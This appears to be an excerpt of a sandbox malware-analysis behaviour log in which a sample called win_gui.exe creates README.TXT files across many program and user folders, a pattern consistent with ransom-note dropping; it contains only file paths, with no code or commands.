Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Music\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\Public\Videos\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Esl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Client\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Licenses\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Licenses16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\loc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\rsodWoW6432\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vreg\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vregwow6432\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Aut2Exe\Icons\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\COM\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Geshi\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Prettify\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\SciTE\api\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\catalog\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win7\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\win8\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\EFOYFBOLXA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\EOWRVPQCCS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\GRXZDKKVDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\HMPPSXQPQV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\JDDHMPCDUJ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\LHEPQPGEWF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\NVWZAPQSQL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\NYMMPCEIMA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\QFAPOWPAFG\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\UNKRLCVOHV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Desktop\ZGGKNSUKOP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\EFOYFBOLXA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\EOWRVPQCCS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\GRXZDKKVDB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\HMPPSXQPQV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\JDDHMPCDUJ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\LHEPQPGEWF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\NVWZAPQSQL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\NYMMPCEIMA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\QFAPOWPAFG\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\UNKRLCVOHV\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Documents\ZGGKNSUKOP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Favorites\Links\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Pictures\Camera Roll\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\Pictures\Saved Pictures\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\client\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dtplugin\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\plugin2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\javafx\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\jdk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\applet\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\cmm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\deploy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\ext\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\i386\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jfr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\management\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Colors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Effects\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\PUB60COR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\Addons\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1036\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\3082\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AccessWeb\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\Presentation Designs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Common AppData\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\System\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\SystemX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ACCWIZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AugLoop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\BORDERS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Configuration\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FloodgateExperiences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f14\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f33\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f4\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f7\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000006\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000008\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000009\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000011\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000050\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000055\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000064\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_w1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LogoImages\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Media\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Simple\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Crimson\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Notepad++\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\PSPad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\TextPad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OneNote\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\osfFPA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookAutoDiscover\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PAGESIZE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PersonaSpy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PROOF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBBA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBWIZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\QUERIES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SAMPLES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SkypeSrv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\STARTUP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\XLSTART\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\README.TXTJump to behavior
